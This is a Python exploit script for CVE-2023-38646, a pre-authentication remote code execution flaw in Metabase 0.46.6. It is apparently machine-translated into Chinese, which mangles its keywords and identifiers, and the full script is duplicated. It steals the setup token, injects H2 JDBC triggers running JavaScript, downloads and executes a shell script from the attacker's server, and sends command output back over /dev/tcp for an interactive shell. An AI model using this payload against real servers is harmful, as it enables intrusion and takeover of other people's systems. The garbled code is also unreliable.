#利用title: metabase 0.46.6 -Pre -auth远程代码执行
#Google Dork: N/A
#日期: 13-10-2023
#利用作者: Musyoka Ian
#供应商homepage: https://www.metabase.com/
#软件link: https://www.metabase.com/
#版本: metabase 0.46.6
#测试在: Ubuntu 22.04,metabase 0.46.6
#CVE : CVE-2023-38646
#!/usr/bin/env Python3
导入套接字
从http.server导入httpserver,basehttprequesthandler
从输入任何导入
导入请求
从socketserver导入螺纹mixin
导入线程
导入系统
导入argparse
从TermColor导入彩色
从CMD导入CMD
导入
从base64导入b64decode
类术语(CMD):
提示='metabase_shell'
def默认值(self,args):
壳(args)
类处理程序(BaseHttpRequestHandler):
def do_get(self):
全球成功
如果self.path=='/可剥削的:
self.send_response(200)
self.end_headers()
self.wfile.write(f'#!/bin/bash \ n $@ | base64 -w 0/dev/tcp/{argument.lhost}/{gright.lport}'。encode())
成功=true
其他:
打印(self.path)
#sys.exit(1)
def log_message(self,format: str, *args: Any)-NONE:
没有返回
类服务器(httpserver):
经过
DEF RUN():
全局httpsserver
httpserver=server(('0.0.0.0',gright.sport),处理程序)
httpserver.serve_forever()
def exploit():
全球成功,setup_token
打印(彩色('[*]检索设置令牌','green'))
setuptoken_request=requests.get(f'{gright.url}/api/session/properties')
setup_token=re.search(''setup-token':'(。*?)'',setuptoken_request.text,re.dotall).group(1)
print(colored(f'[+]设置token: {setup_token}','green'))
print(colored('[*] tesing如果metabase脆弱','green'))))
有效载荷={
'token': setup_token,
'细节:
{
'is_on_demand': false,
'is_full_sync': false,
'is_sample': false,
'cache_ttl':无,
'炼油厂: false,
'auto_run_queries': True,
'计划':
{},
'细节:
{
'db': f'zip:/app/metabase.jar!/sample-database.db; mode=mssqlServer; trace_level_system_out_out=1 \\; create trigger; create trigger iampwned the inoceal _schema.schema.tables asschema.tables as $$/javascript \ javascript \ nnew java.net.url('http://{gright.lhost} : {gright.sport}/exploable')。openconNection()。
'Advanced-options': false,
'SSL': TRUE
},
'name':'An-Sec-Research-Musyoka',
'Engine':'H2'
}
}
计时器=0
print(colored(f'[+]启动http server of port {gright.sport}','blue'))
thread=threading.thread(target=run,)
thread.start()
定时器!=120:
test=requests.post(f'{gright.url}/api/setup/validate',json=有效载荷)
如果成功==true :
print(colored('[+] metabase版本似乎可利用','green'))
休息
Elif Timer==120:
print(colored('[ - ]服务似乎没有可利用的退出.','red'))
sys.exit(1)
打印(彩色('[+]利用服务器','red'))))
终端=termial()
终端。cmdloop()
def shell(命令):
global setup_token,payload2
payload2={
'token': setup_token,
'细节:
{
'is_on_demand': false,
'is_full_sync': false,
'is_sample': false,
'cache_ttl':无,
'炼油厂: false,
'auto_run_queries': True,
'计划':
{},
'细节:
{
'db': f'zip:/app/metabase.jar!/sample-database.db; mode=mssqlServer; trace_level_system_out_out=1 \\; create trigger trigger pwnshell on offection_schema.tables_schema.tables asschema.tables as $ javascript as $ javascript \ njava.njava.lang.lang.lang.lang.lang.lang.lang.lang.lang.lang.lang.lang.lang.lang.langrandrime) {gright.lhost} : {gright.sport}/可剥削的-o/dev/shm/exec.sh') \ nqun$ -=x',
'Advanced-options': false,
'SSL': TRUE
},
'name':'An-Sec-Research-Team',
'Engine':'H2'
}
}
output=requests.post(f'{gright.url}/api/setup/validate',json=payload2)
bind_thread=threading.thread(target=bind_function,)
bind_thread.start()
#完成有效载荷
payload2 ['lidese'] ['详细信息'] ['db']=f'zip:/app/metabase.jar!/sample-database.db; mode=mssqlserver; trace_level_system_out_out=1 $$ //javascript \ njava.lang.runtime.getRuntime()。exec('bash/dev/shm/exec.sh {command}')\ n $$ - =x'
requests.post(f'{gright.url}/api/setup/validate',json=payload2)
#print(output.text)
def bind_function():
TRY:
sock=socket.socket(socket.af_inet,socket.sock_stream)
sock.bind(('0.0.0.0',gright.lport))
sock.listen()
conn,addr=sock.accept()
data=conn.recv(10240).decode('ascii')
print(f'\ n {(b64decode(data))。decode()}')
除异常外,例如EX:
print(colored(f'[ - ] error: {ex}','red'))
经过
如果name=='__ -Main __':
print(彩色('[*] CVE-2023-38646的利用脚本[Metabase中的Pre-Atuth RCE]','Magenta')))))))
args=argparse.argumentparser(description='cve-2023-38646的利用脚本[metabase中的pre-auth rce]')
args.add_argument(' - l',' - lhost',metavar='',help='攻击者的bind ip地址',type=str,quilt
args.add_argument(' - p',' - lport',metavar='',help='攻击者的bind端口',type=int,quirte=true=true)
args.add_argument(' - p',' - sport',metavar='',help='http server bind port',type=int,quirtect=true=true)
args.add_argument(' - u',' - url',metavar='',help='metabase web应用程序url',type=str,quilt
参数=args.parse_args()
如果gright.url.endswith('/'):
gright.url=gright.url [:-1]
成功=false
开发()
#Google Dork: N/A
#日期: 13-10-2023
#利用作者: Musyoka Ian
#供应商homepage: https://www.metabase.com/
#软件link: https://www.metabase.com/
#版本: metabase 0.46.6
#测试在: Ubuntu 22.04,metabase 0.46.6
#CVE : CVE-2023-38646
#!/usr/bin/env Python3
导入套接字
从http.server导入httpserver,basehttprequesthandler
从输入任何导入
导入请求
从socketserver导入螺纹mixin
导入线程
导入系统
导入argparse
从TermColor导入彩色
从CMD导入CMD
导入
从base64导入b64decode
类术语(CMD):
提示='metabase_shell'
def默认值(self,args):
壳(args)
类处理程序(BaseHttpRequestHandler):
def do_get(self):
全球成功
如果self.path=='/可剥削的:
self.send_response(200)
self.end_headers()
self.wfile.write(f'#!/bin/bash \ n $@ | base64 -w 0/dev/tcp/{argument.lhost}/{gright.lport}'。encode())
成功=true
其他:
打印(self.path)
#sys.exit(1)
def log_message(self,format: str, *args: Any)-NONE:
没有返回
类服务器(httpserver):
经过
DEF RUN():
全局httpsserver
httpserver=server(('0.0.0.0',gright.sport),处理程序)
httpserver.serve_forever()
def exploit():
全球成功,setup_token
打印(彩色('[*]检索设置令牌','green'))
setuptoken_request=requests.get(f'{gright.url}/api/session/properties')
setup_token=re.search(''setup-token':'(。*?)'',setuptoken_request.text,re.dotall).group(1)
print(colored(f'[+]设置token: {setup_token}','green'))
print(colored('[*] tesing如果metabase脆弱','green'))))
有效载荷={
'token': setup_token,
'细节:
{
'is_on_demand': false,
'is_full_sync': false,
'is_sample': false,
'cache_ttl':无,
'炼油厂: false,
'auto_run_queries': True,
'计划':
{},
'细节:
{
'db': f'zip:/app/metabase.jar!/sample-database.db; mode=mssqlServer; trace_level_system_out_out=1 \\; create trigger; create trigger iampwned the inoceal _schema.schema.tables asschema.tables as $$/javascript \ javascript \ nnew java.net.url('http://{gright.lhost} : {gright.sport}/exploable')。openconNection()。
'Advanced-options': false,
'SSL': TRUE
},
'name':'An-Sec-Research-Musyoka',
'Engine':'H2'
}
}
计时器=0
print(colored(f'[+]启动http server of port {gright.sport}','blue'))
thread=threading.thread(target=run,)
thread.start()
定时器!=120:
test=requests.post(f'{gright.url}/api/setup/validate',json=有效载荷)
如果成功==true :
print(colored('[+] metabase版本似乎可利用','green'))
休息
Elif Timer==120:
print(colored('[ - ]服务似乎没有可利用的退出.','red'))
sys.exit(1)
打印(彩色('[+]利用服务器','red'))))
终端=termial()
终端。cmdloop()
def shell(命令):
global setup_token,payload2
payload2={
'token': setup_token,
'细节:
{
'is_on_demand': false,
'is_full_sync': false,
'is_sample': false,
'cache_ttl':无,
'炼油厂: false,
'auto_run_queries': True,
'计划':
{},
'细节:
{
'db': f'zip:/app/metabase.jar!/sample-database.db; mode=mssqlServer; trace_level_system_out_out=1 \\; create trigger trigger pwnshell on offection_schema.tables_schema.tables asschema.tables as $ javascript as $ javascript \ njava.njava.lang.lang.lang.lang.lang.lang.lang.lang.lang.lang.lang.lang.lang.lang.langrandrime) {gright.lhost} : {gright.sport}/可剥削的-o/dev/shm/exec.sh') \ nqun$ -=x',
'Advanced-options': false,
'SSL': TRUE
},
'name':'An-Sec-Research-Team',
'Engine':'H2'
}
}
output=requests.post(f'{gright.url}/api/setup/validate',json=payload2)
bind_thread=threading.thread(target=bind_function,)
bind_thread.start()
#完成有效载荷
payload2 ['lidese'] ['详细信息'] ['db']=f'zip:/app/metabase.jar!/sample-database.db; mode=mssqlserver; trace_level_system_out_out=1 $$ //javascript \ njava.lang.runtime.getRuntime()。exec('bash/dev/shm/exec.sh {command}')\ n $$ - =x'
requests.post(f'{gright.url}/api/setup/validate',json=payload2)
#print(output.text)
def bind_function():
TRY:
sock=socket.socket(socket.af_inet,socket.sock_stream)
sock.bind(('0.0.0.0',gright.lport))
sock.listen()
conn,addr=sock.accept()
data=conn.recv(10240).decode('ascii')
print(f'\ n {(b64decode(data))。decode()}')
除异常外,例如EX:
print(colored(f'[ - ] error: {ex}','red'))
经过
如果name=='__ -Main __':
print(彩色('[*] CVE-2023-38646的利用脚本[Metabase中的Pre-Atuth RCE]','Magenta')))))))
args=argparse.argumentparser(description='cve-2023-38646的利用脚本[metabase中的pre-auth rce]')
args.add_argument(' - l',' - lhost',metavar='',help='攻击者的bind ip地址',type=str,quilt
args.add_argument(' - p',' - lport',metavar='',help='攻击者的bind端口',type=int,quirte=true=true)
args.add_argument(' - p',' - sport',metavar='',help='http server bind port',type=int,quirtect=true=true)
args.add_argument(' - u',' - url',metavar='',help='metabase web应用程序url',type=str,quilt
参数=args.parse_args()
如果gright.url.endswith('/'):
gright.url=gright.url [:-1]
成功=false
开发()